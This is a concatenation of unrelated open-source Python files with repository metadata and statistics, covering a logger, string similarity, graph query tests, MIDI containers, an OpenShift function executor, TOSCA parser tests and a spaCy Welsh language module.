amgc500/MCNTE
dae1a7b90bb7b338438eb470db9f1787999d9186
[ "MIT" ]
null
null
null
Logger.py
amgc500/MCNTE
dae1a7b90bb7b338438eb470db9f1787999d9186
[ "MIT" ]
null
null
null
Logger.py
amgc500/MCNTE
dae1a7b90bb7b338438eb470db9f1787999d9186
[ "MIT" ]
null
null
null
"""Implement a logging system. This class will direct output to both the screen and a specified file. Code for the article "Monte Carlo Methods for the Neutron Transport Equation. By A. Cox, A. Kyprianou, S. Harris, M. Wang. Thi sfile contains the code to produce the plots in the case of the 2D version of the NTE. MIT License Copyright (c) Alexander Cox, 2020. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import sys import os from pathlib import Path class Logger(object): """Send output to file and screen. Based on an answer here: https://stackoverflow.com/questions/14906764/how-to-redirect-stdout-to-both-file-and-console-with-scripting """ def __init__(self): self.terminal = sys.stdout log_dir = os.getcwd()+'/output' Path(log_dir).mkdir(parents=True, exist_ok=True) self.log = open(log_dir+"/logfile.log", "a") def write(self, message): """Send message to screen and file.""" self.terminal.write(message) self.log.write(message) def close(self): """Close open filestream. Revert to screen only output.""" self.log.close() sys.stdout = self.terminal def flush(self): """Not sure if needed.""" # this flush method is needed for python 3 compatibility. # this handles the flush command by doing nothing. # you might want to specify some extra behavior here. pass
35.115942
115
0.723896
364
2,423
4.796703
0.53022
0.050401
0.014891
0
0
0
0
0
0
0
0
0.007273
0.20553
2,423
68
116
35.632353
0.89974
0.752373
0
0
0
0
0.035842
0
0
0
0
0
0
1
0.235294
false
0.058824
0.176471
0
0.470588
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
9721ef07918231ab859cd2bc6178d6541bbf6879
171
py
Python
eln/decorators/register_reader.py
lehvitus/eln
b78362af20cacffe076bf3dbfd27dcc090e43e39
[ "BSD-3-Clause" ]
2
2020-02-05T04:00:32.000Z
2020-03-18T02:12:33.000Z
eln/decorators/register_reader.py
oleoneto/eln
b78362af20cacffe076bf3dbfd27dcc090e43e39
[ "BSD-3-Clause" ]
1
2020-03-18T02:36:04.000Z
2020-03-18T02:36:04.000Z
eln/decorators/register_reader.py
oleoneto/eln
b78362af20cacffe076bf3dbfd27dcc090e43e39
[ "BSD-3-Clause" ]
null
null
null
# eln:decorators READERS = dict() # Decorator for adding reader functions def register_reader(function): READERS[function.__name__] = function return function
15.545455
41
0.748538
19
171
6.473684
0.736842
0
0
0
0
0
0
0
0
0
0
0
0.175439
171
10
42
17.1
0.87234
0.304094
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
972cb511c9c5f56f2bd7197d4176ab7ff15fc5f5
1,012
py
Python
lib/oci_utils/migrate/exception.py
totalamateurhour/oci-utils
b3e8348f66f8a26453fab0f3b616b3c1585468a7
[ "UPL-1.0" ]
35
2019-04-21T00:58:30.000Z
2022-01-28T15:22:41.000Z
lib/oci_utils/migrate/exception.py
totalamateurhour/oci-utils
b3e8348f66f8a26453fab0f3b616b3c1585468a7
[ "UPL-1.0" ]
43
2019-05-19T20:13:41.000Z
2022-03-31T17:39:25.000Z
lib/oci_utils/migrate/exception.py
totalamateurhour/oci-utils
b3e8348f66f8a26453fab0f3b616b3c1585468a7
[ "UPL-1.0" ]
23
2019-04-10T12:48:00.000Z
2022-03-25T16:57:47.000Z
# oci-utils # # Copyright (c) 2019, 2020 Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown # at http://oss.oracle.com/licenses/upl. """ Module with oci migrate related exceptions. """ class OciMigrateException(Exception): """ Exceptions for the Image Migrate to OCI context. """ __args = None def __init__(self, message=None): """ Initialisation of the Oci Migrate Exception. Parameters ---------- message: str The exception message. """ self._message = message assert (self._message is not None), 'No exception message given' if self._message is None: self._message = 'An exception occurred, no further information' def __str__(self): """ Get this OciMigrateException representation. Returns ------- str The error message. """ return str(self._message)
24.682927
77
0.603755
110
1,012
5.418182
0.627273
0.110738
0.043624
0
0
0
0
0
0
0
0
0.014085
0.298419
1,012
40
78
25.3
0.825352
0.477273
0
0
0
0
0.177057
0
0
0
0
0
0.111111
1
0.222222
false
0
0
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
973cc92d02ecaec218f328cfa03f67962ce46109
857
py
Python
smart_match/monge_elkan.py
wujinglin226/smart-match
aa84f9e4dda89aadc23f439f33d20269e2674b0a
[ "MIT" ]
1
2020-09-28T13:14:31.000Z
2020-09-28T13:14:31.000Z
smart_match/monge_elkan.py
yuqiangfeng96/smart-match
86a485b569c31d081b3f165aac9532f595d3deec
[ "MIT" ]
null
null
null
smart_match/monge_elkan.py
yuqiangfeng96/smart-match
86a485b569c31d081b3f165aac9532f595d3deec
[ "MIT" ]
null
null
null
import smart_match from math import sqrt class MongeElkan: def __init__(self, method=None): self.method = smart_match.get_method(method) def similarity(self, X, Y): if not X and not Y: return 1 if not X or not Y: return 0 return sqrt(self.monge_elkan(X, Y) * self.monge_elkan(Y, X)) def monge_elkan(self, s, t): sum_score = 0 for x in s: max_score = 0 for y in t: max_score = max(max_score, self.method.similarity(x, y)) sum_score += max_score return sum_score / len(s) def dissimilarity(self, s, t): return 1 - self.similarity(s, t) def __repr__(self): return f'MongeElkan [method={self.method}]'
24.485714
72
0.514586
113
857
3.716814
0.327434
0.095238
0.028571
0
0
0
0
0
0
0
0
0.009728
0.400233
857
35
73
24.485714
0.807393
0
0
0
0
0
0.038462
0.025641
0
0
0
0
0
1
0.217391
false
0
0.086957
0.086957
0.608696
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
97463ce31028569c4e360e76832abc2a9f99d118
3,957
py
Python
tests/test_parser.py
MacarielAerial/networkx-query
07d9d4a5ff1f2db55a62a490458c5461dad057bb
[ "MIT" ]
8
2020-05-02T00:14:19.000Z
2021-11-16T19:27:37.000Z
tests/test_parser.py
MacarielAerial/networkx-query
07d9d4a5ff1f2db55a62a490458c5461dad057bb
[ "MIT" ]
null
null
null
tests/test_parser.py
MacarielAerial/networkx-query
07d9d4a5ff1f2db55a62a490458c5461dad057bb
[ "MIT" ]
1
2021-03-31T08:30:13.000Z
2021-03-31T08:30:13.000Z
import pytest from networkx_query import ParserException from networkx_query.parser import compile_ast, explain, parse node_0 = {'application': 'test'} node_1 = {'application': 'test', 'weight': 3, 'group': 'my-group'} node_2 = {'_link': {'provider': "aws", 'resource_type': "test", 'other': {'weight': 2}}} def test_explain(): result = explain(parse({'not': {'has': ['group']}, 'has': 'application', 'eq': [('_link', 'other', 'weight'), 2]})) assert result == { 'and': [{'not': [{'has': ['group']}]}, {'has': ['application']}, {'eq': [('_link', 'other', 'weight'), 2]}] } def test_compile_expression_has(): func = compile_ast(parse({'has': 'application'})) assert func(node_0) assert func(node_1) def test_compile_expression_not_has(): func = compile_ast(parse({'not': {'has': 'group'}})) assert func(node_0) assert not func(node_1) def test_compile_expression_contains(): func = compile_ast(parse({'contains': ['group', 'my']})) assert not func(node_0) assert func(node_1) def test_compile_expression_has_dict(): func = compile_ast(parse({'has': '_link'})) assert not func(node_0) assert func(node_2) def test_compile_expression_has_path(): func = compile_ast(parse({'has': [('_link', 'other', 'weight')]})) assert not func(node_0) assert func(node_2) def test_compile_expression_eq_path(): func = compile_ast(parse({'eq': [('_link', 'other', 'weight'), 2]})) assert func(node_2) def test_compile_expression_neq_path(): func = compile_ast(parse({'neq': [('_link', 'other', 'weight'), 2]})) assert not func(node_2) func = compile_ast(parse({'neq': [('_link', 'other', 'weight'), 8]})) assert func(node_2) def test_compile_expression_gt_path(): func = compile_ast(parse({'gt': [('_link', 'other', 'weight'), 1]})) assert func(node_2) func = compile_ast(parse({'gt': [('_link', 'other', 'weight'), 2]})) assert not func(node_2) def test_compile_expression_gte_path(): func = compile_ast(parse({'gte': [('_link', 'other', 'weight'), 2]})) assert func(node_2) func = compile_ast(parse({'gte': [('_link', 'other', 'weight'), 1]})) assert func(node_2) def test_compile_expression_lte_path(): func = compile_ast(parse({'lte': [('_link', 'other', 'weight'), 2]})) assert func(node_2) func = compile_ast(parse({'lte': [('_link', 'other', 'weight'), 3]})) assert func(node_2) def test_compile_expression_lt_path(): func = compile_ast(parse({'lt': [('_link', 'other', 'weight'), 3]})) assert func(node_2) func = compile_ast(parse({'lt': [('_link', 'other', 'weight'), 2]})) assert not func(node_2) def test_compile_expression_in_path(): func = compile_ast(parse({'in': [('_link', 'other', 'weight'), [1, 2, 3]]})) assert func(node_2) def test_compile_expression_and(): func = compile_ast(parse({'and': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert not func(node_0) assert func(node_1) assert not func(node_2) def test_compile_expression_or(): func = compile_ast(parse({'or': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert func(node_0) assert func(node_1) assert not func(node_2) def test_compile_expression_xor(): func = compile_ast(parse({'xor': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert func(node_0) assert not func(node_1) assert not func(node_2) def test_compile_expression_nxor(): func = compile_ast(parse({'nxor': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert not func(node_0) assert func(node_1) assert func(node_2) def test_parse_exception(): with pytest.raises(ParserException): parse({'has': ['_link', 'other', 'weight']}) def test_parse_raise_unknown_operator(): with pytest.raises(ParserException): parse({'idontexistatall': ['_link', 'other', 'weight']})
30.674419
119
0.62699
528
3,957
4.422348
0.106061
0.116488
0.12591
0.170878
0.783298
0.681799
0.643255
0.622698
0.440685
0.372591
0
0.020242
0.163508
3,957
128
120
30.914063
0.685196
0
0
0.409091
0
0
0.156937
0
0
0
0
0
0.397727
1
0.215909
false
0
0.034091
0
0.25
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
9748ebd3c81e9508be7de2eff6f2fc9edd532fd6
462
py
Python
src/apps/spam/views/__init__.py
SlonSky/django-grasped
97ea2f6d2e10232fc084a6407fa089df2cdf086e
[ "MIT" ]
null
null
null
src/apps/spam/views/__init__.py
SlonSky/django-grasped
97ea2f6d2e10232fc084a6407fa089df2cdf086e
[ "MIT" ]
null
null
null
src/apps/spam/views/__init__.py
SlonSky/django-grasped
97ea2f6d2e10232fc084a6407fa089df2cdf086e
[ "MIT" ]
null
null
null
""" This package represents Presentation layer. Put your views for different API. Your views should use services from Application layer, without implementing logic and only preparing given data from request for services and formatting it for response. All of sub-packages should use the same services interfaces, differentiating only be data presentation. Remember: your Presentation layer is Adapter of Request for Services and of Services for Response. """
28.875
54
0.816017
66
462
5.712121
0.606061
0.090186
0.095491
0.111406
0
0
0
0
0
0
0
0
0.151515
462
15
55
30.8
0.961735
0.980519
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
974c13a3ebcb86826ca3216faddaae29b8d46993
245
py
Python
archived/archive-WSPS/modify_global_att.py
XiaoxiongXie/WRF-SUEWS
51f8d2359b394016e65121f3baab908b1ad4d89c
[ "MIT" ]
2
2020-09-24T09:15:31.000Z
2020-09-28T16:16:30.000Z
archived/archive-WSPS/modify_global_att.py
XiaoxiongXie/WRF-SUEWS
51f8d2359b394016e65121f3baab908b1ad4d89c
[ "MIT" ]
3
2020-09-24T13:46:24.000Z
2020-10-01T09:54:17.000Z
archived/archive-WSPS/modify_global_att.py
XiaoxiongXie/WRF-SUEWS
51f8d2359b394016e65121f3baab908b1ad4d89c
[ "MIT" ]
2
2020-10-01T09:46:58.000Z
2022-01-09T10:38:21.000Z
#!/usr/bin/env python import netCDF4 as nc4 import os filename = os.path.join('/Users/zhenkunli/work/2018/WRFV3/run', 'wrfinput_d01') print 'Processing file %s...' % filename nc = nc4.Dataset(filename, 'a') nc.SF_SURFACE_PHYSICS = 9 nc.close()
24.5
79
0.726531
39
245
4.487179
0.820513
0
0
0
0
0
0
0
0
0
0
0.050459
0.110204
245
9
80
27.222222
0.752294
0.081633
0
0
0
0
0.3125
0.160714
0
0
0
0
0
0
null
null
0
0.285714
null
null
0.142857
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
976d30103ee0ad1012aff242e5d67605f2fb00a2
1,597
py
Python
midiio/containers.py
blowfeld/python-midi-io
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
[ "MIT" ]
1
2020-10-19T08:12:35.000Z
2020-10-19T08:12:35.000Z
midiio/containers.py
blowfeld/python-midi-io
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
[ "MIT" ]
3
2017-11-18T16:46:01.000Z
2021-11-20T22:55:38.000Z
midiio/containers.py
blowfeld/python-midi-io
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
[ "MIT" ]
null
null
null
from pprint import pformat class Pattern(object): def __init__(self, tracks=[], resolution=220, format=1): self._format = format self._resolution = resolution self._tracks = tuple(tracks) @property def format(self): return self._format @property def resolution(self): return self._resolution @property def tracks(self): return self._tracks def append(track): return Pattern(self._format, self.resolution, self._tracks + (track, )) def extend(tracks): return Pattern(self._format, self.resolution, self._tracks + tuple(tracks)) def __getitem__(self, key): return self._tracks[key] def __iter__(self): return iter(self._tracks) def __len__(self): return len(self._tracks) def __repr__(self): return "midiio.Pattern(format=%r, resolution=%r, tracks=\\\n%s)" % \ (self.format, self.resolution, pformat(list(self._tracks))) class Track(object): def __init__(self, events=[]): self._events = tuple(events) @property def events(self): return self._events def append(event): return Track(self._events + (event, )) def extend(events): return Track(self._events + tuple(events)) def __getitem__(self, key): return self._events[key] def __iter__(self): return iter(self._events) def __len__(self): return len(self._events) def __repr__(self): return "midiio.Track(\\\n %s)" % (pformat(list(self._events)).replace('\n', '\n '), )
24.953125
95
0.619912
186
1,597
4.989247
0.182796
0.107759
0.086207
0.077586
0.364224
0.269397
0.161638
0.101293
0
0
0
0.003353
0.252974
1,597
63
96
25.349206
0.774518
0
0
0.26087
0
0
0.051972
0.015654
0
0
0
0
0
1
0.391304
false
0
0.021739
0.347826
0.804348
0.021739
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
97b740717ca0bdeb0bb1cbe8a4771b0412e31734
503
py
Python
SET/difference.py
ragulkesavan/Python-75-Hackathon
adda961155467a428938fc52e2d761bf5b786788
[ "MIT" ]
null
null
null
SET/difference.py
ragulkesavan/Python-75-Hackathon
adda961155467a428938fc52e2d761bf5b786788
[ "MIT" ]
null
null
null
SET/difference.py
ragulkesavan/Python-75-Hackathon
adda961155467a428938fc52e2d761bf5b786788
[ "MIT" ]
null
null
null
phone=set(["mi","apple","samsung","giomee","jio","nokia","karbon"]) tv=set(["samsung","apple","onida","vediocon"]) brand=phone.difference(tv) print "brands in phone : ",phone print "brands in tv : ",tv print "phone brands that do not have tv : ",brand ''' OUTPUT: brands in phone : set(['apple', 'samsung', 'jio', 'nokia', 'mi', 'giomee', 'karbon']) brands in tv : set(['onida', 'vediocon', 'apple', 'samsung']) phone brands that do not have tv : set(['giomee', 'jio', 'nokia', 'mi', 'karbon']) '''
35.928571
86
0.626243
71
503
4.43662
0.309859
0.101587
0.088889
0.107937
0.165079
0.165079
0.165079
0
0
0
0
0
0.127237
503
13
87
38.692308
0.71754
0
0
0
0
0
0.5
0
0
0
0
0
0
0
null
null
0
0
null
null
0.5
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
97d1eed2070eaf000dcbdb4bf3fe9d744a01be14
1,255
py
Python
snafulib/executors/openshift.py
isabella232/snafu
91cc181f4073fa16d5be9ae6202342102f75d128
[ "Apache-2.0" ]
31
2017-04-22T07:16:08.000Z
2022-03-13T13:36:17.000Z
snafulib/executors/openshift.py
serviceprototypinglab/snafu
91cc181f4073fa16d5be9ae6202342102f75d128
[ "Apache-2.0" ]
1
2022-02-18T13:07:37.000Z
2022-02-18T13:07:37.000Z
snafulib/executors/openshift.py
isabella232/snafu
91cc181f4073fa16d5be9ae6202342102f75d128
[ "Apache-2.0" ]
7
2017-08-17T11:47:52.000Z
2022-02-18T11:51:03.000Z
# Snafu: Snake Functions - OpenShift Executor import requests import os import configparser import subprocess container = "jszhaw/snafu" endpoints = {} def executecontrol(flaskrequest, tenant): if not tenant in endpoints: username = os.getenv("OPENSHIFT_USERNAME") password = os.getenv("OPENSHIFT_PASSWORD") password = os.getenv("OPENSHIFT_PROJECT") if not username or not password or not project: return os.system("oc login https://console.appuio.ch/ --username={} --password={}".format(username, password)) os.system("oc project {}".format(project)) os.system("oc new-app --name snafu-{} jszhaw/snafu".format(tenant)) p = subprocess.run("oc status | grep svc/snafu-{} | cut -d " " -f 3".format(tenant), shell=True, stdout=subprocess.PIPE) endpoints[tenant] = "http://{}".format(p.decode("utf-8")) # FIXME: mounting the tenant's volume container to /opt/functions-local endpoint = endpoints[tenant] headers = {} headers["X-Amz-Date"] = flaskrequest.headers.get("X-Amz-Date") data = flaskrequest.data.decode("utf-8") #method=r.method -> requests.post reply = requests.post(endpoint + flaskrequest.path, data=data, headers=headers) if reply.status_code == 200: return reply.content.decode("utf-8") else: return
31.375
122
0.717131
167
1,255
5.365269
0.467066
0.026786
0.05692
0.055804
0
0
0
0
0
0
0
0.006422
0.131474
1,255
39
123
32.179487
0.815596
0.115538
0
0.074074
0
0
0.242315
0
0
0
0
0.025641
0
1
0.037037
false
0.148148
0.148148
0
0.296296
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
1
0
0
0
0
0
2
8af0066c9df56b9dfc441a1e4b4117631b55bd62
3,006
py
Python
tools/profiling/microbenchmarks/speedup.py
lalo/grpc
4865c79548d4f83ebae4e10fbaf4c3ba10535c97
[ "BSD-3-Clause" ]
null
null
null
tools/profiling/microbenchmarks/speedup.py
lalo/grpc
4865c79548d4f83ebae4e10fbaf4c3ba10535c97
[ "BSD-3-Clause" ]
null
null
null
tools/profiling/microbenchmarks/speedup.py
lalo/grpc
4865c79548d4f83ebae4e10fbaf4c3ba10535c97
[ "BSD-3-Clause" ]
1
2020-11-04T04:19:45.000Z
2020-11-04T04:19:45.000Z
# Copyright 2017, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from scipy import stats import math _THRESHOLD = 1e-10 def scale(a, mul): return [x*mul for x in a] def cmp(a, b): return stats.ttest_ind(a, b) def speedup(new, old): s0, p0 = cmp(new, old) if math.isnan(p0): return 0 if s0 == 0: return 0 if p0 > _THRESHOLD: return 0 if s0 < 0: pct = 1 while pct < 101: sp, pp = cmp(new, scale(old, 1 - pct/100.0)) if sp > 0: break if pp > _THRESHOLD: break pct += 1 return -(pct - 1) else: pct = 1 while pct < 100000: sp, pp = cmp(new, scale(old, 1 + pct/100.0)) if sp < 0: break if pp > _THRESHOLD: break pct += 1 return pct - 1 if __name__ == "__main__": new=[66034560.0, 126765693.0, 99074674.0, 98588433.0, 96731372.0, 110179725.0, 103802110.0, 101139800.0, 102357205.0, 99016353.0, 98840824.0, 99585632.0, 98791720.0, 96171521.0, 95327098.0, 95629704.0, 98209772.0, 99779411.0, 100182488.0, 98354192.0, 99644781.0, 98546709.0, 99019176.0, 99543014.0, 99077269.0, 98046601.0, 99319039.0, 98542572.0, 98886614.0, 72560968.0] old=[60423464.0, 71249570.0, 73213089.0, 73200055.0, 72911768.0, 72347798.0, 72494672.0, 72756976.0, 72116565.0, 71541342.0, 73442538.0, 74817383.0, 73007780.0, 72499062.0, 72404945.0, 71843504.0, 73245405.0, 72778304.0, 74004519.0, 73694464.0, 72919931.0, 72955481.0, 71583857.0, 71350467.0, 71836817.0, 70064115.0, 70355345.0, 72516202.0, 71716777.0, 71532266.0] print speedup(new, old) print speedup(old, new)
44.205882
372
0.720892
468
3,006
4.602564
0.463675
0.011142
0.012535
0.021356
0.159703
0.126277
0.126277
0.126277
0.126277
0.126277
0
0.240733
0.1833
3,006
67
373
44.865672
0.63666
0.489355
0
0.181818
0
0
0.005312
0
0
0
0
0
0
0
null
null
0
0.060606
null
null
0.060606
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
c115d0dcb588341f74d0f27a5c67b230c70e0776
2,203
py
Python
tests/extensions/aria_extension_tosca/simple_v1_0/functions/test_function_get_operation_output.py
tnadeau/incubator-ariatosca
de32028783969bc980144afa3c91061c7236459c
[ "Apache-2.0" ]
null
null
null
tests/extensions/aria_extension_tosca/simple_v1_0/functions/test_function_get_operation_output.py
tnadeau/incubator-ariatosca
de32028783969bc980144afa3c91061c7236459c
[ "Apache-2.0" ]
null
null
null
tests/extensions/aria_extension_tosca/simple_v1_0/functions/test_function_get_operation_output.py
tnadeau/incubator-ariatosca
de32028783969bc980144afa3c91061c7236459c
[ "Apache-2.0" ]
1
2020-06-16T15:13:06.000Z
2020-06-16T15:13:06.000Z
# -*- coding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Syntax def test_functions_get_operation_output_syntax_empty(parser): parser.parse_literal(""" tosca_definitions_version: tosca_simple_yaml_1_0 node_types: MyType: properties: my_parameter: type: string topology_template: node_templates: my_node: type: MyType properties: my_parameter: { get_operation_output: [] } # needs at least two args """).assert_failure() # Arguments def test_functions_get_operation_output(parser): parser.parse_literal(""" tosca_definitions_version: tosca_simple_yaml_1_0 interface_types: MyType: my_operation: {} node_types: MyType: properties: my_parameter: type: string interfaces: MyInterface: type: MyType topology_template: node_templates: my_node: type: MyType properties: my_parameter: { get_operation_output: [ my_node, MyInterface, my_operation, my_variable ] } """).assert_success() # Unicode def test_functions_get_operation_output_unicode(parser): parser.parse_literal(""" tosca_definitions_version: tosca_simple_yaml_1_0 interface_types: 類型: 手術: {} node_types: 類型: properties: 參數: type: string interfaces: 接口: type: 類型 topology_template: node_templates: 模板: type: 類型 properties: 參數: { get_operation_output: [ 模板, 接口, 手術, 變量 ] } """).assert_success()
25.917647
99
0.71675
285
2,203
5.308772
0.424561
0.039656
0.071381
0.071381
0.384666
0.384666
0.317251
0.317251
0.256444
0.256444
0
0.006279
0.204721
2,203
84
100
26.22619
0.857306
0.362687
0
0.77193
0
0
0.750903
0.147292
0
0
0
0
0.052632
1
0.052632
false
0
0
0
0.052632
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c118f0b44128ed4108fefd9f2643f8940209777b
1,484
py
Python
cy/old__init__.py
techiaith/anonymeiddiwr-beta
13391fc62674503e1476d057d787456c1cd0f743
[ "MIT" ]
null
null
null
cy/old__init__.py
techiaith/anonymeiddiwr-beta
13391fc62674503e1476d057d787456c1cd0f743
[ "MIT" ]
null
null
null
cy/old__init__.py
techiaith/anonymeiddiwr-beta
13391fc62674503e1476d057d787456c1cd0f743
[ "MIT" ]
null
null
null
# encoding: utf8 from __future__ import unicode_literals, print_function # Gruff #from spacy.lang.cy.lemmatization import lemmatize_doc #from spacy.lang.cy.dictionary_pos_tagger import rule_based_pos_tag from .tokenizer_exceptions import TOKENIZER_EXCEPTIONS from .tag_map import TAG_MAP from .stop_words import STOP_WORDS from .lemmatizer import LOOKUP from .punctuation import TOKENIZER_SUFFIXES from .norm_exceptions import NORM_EXCEPTIONS from .lex_attrs import LEX_ATTRS from ..tokenizer_exceptions import BASE_EXCEPTIONS from ..norm_exceptions import BASE_NORMS from ...language import Language from ...attrs import LANG, NORM from ...util import update_exc, add_lookups #from ...lemmatizerlookup import Lemmatizer #from ...lemmatizer import Lemmatizer class WelshDefaults(Language.Defaults): lex_attr_getters = dict(Language.Defaults.lex_attr_getters) # lex_attr_getters.update(LEX_ATTRS) # Angen vocab? lex_attr_getters[LANG] = lambda text: 'cy' lex_attr_getters[NORM] = add_lookups(Language.Defaults.lex_attr_getters[NORM], BASE_NORMS, NORM_EXCEPTIONS) tokenizer_exceptions = update_exc(BASE_EXCEPTIONS, TOKENIZER_EXCEPTIONS) tag_map = dict(TAG_MAP) stop_words = set(STOP_WORDS) suffixes = tuple(TOKENIZER_SUFFIXES) lemma_lookup = LOOKUP # @classmethod # def create_lemmatizer(cls, nlp=None): # return Lemmatizer(LOOKUP) class Welsh(Language): lang = 'cy' Defaults = WelshDefaults __all__ = ['Welsh']
29.68
82
0.786388
193
1,484
5.735751
0.336788
0.03794
0.075881
0.062331
0.081301
0
0
0
0
0
0
0.000782
0.138814
1,484
49
83
30.285714
0.865415
0.239892
0
0
0
0
0.008065
0
0
0
0
0
0
1
0
false
0
0.481481
0
0.851852
0.037037
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
c11c1101c7284dfff505791ee890d86d4e6ea9a9
54
py
Python
preprocessing/init_buffer.py
GPrathap/OpenBCIPython
0f5be167fb09d31c15885003eeafec8cdc08dbfa
[ "MIT" ]
1
2021-11-07T12:01:08.000Z
2021-11-07T12:01:08.000Z
preprocessing/init_buffer.py
GPrathap/OpenBCIPython
0f5be167fb09d31c15885003eeafec8cdc08dbfa
[ "MIT" ]
null
null
null
preprocessing/init_buffer.py
GPrathap/OpenBCIPython
0f5be167fb09d31c15885003eeafec8cdc08dbfa
[ "MIT" ]
1
2020-10-15T08:35:01.000Z
2020-10-15T08:35:01.000Z
ring_buffers = [] max_iteration = 10 channel_data = ""
18
18
0.722222
7
54
5.142857
1
0
0
0
0
0
0
0
0
0
0
0.043478
0.148148
54
3
19
18
0.73913
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c123379662e2eddb0a1b05c80adcd7fca1847567
193
py
Python
libsheep/state.py
exogen/80sheep
a6da85f6c10c8088e2c86a186c2934e71e8d2d16
[ "MIT" ]
1
2016-05-09T03:32:09.000Z
2016-05-09T03:32:09.000Z
libsheep/state.py
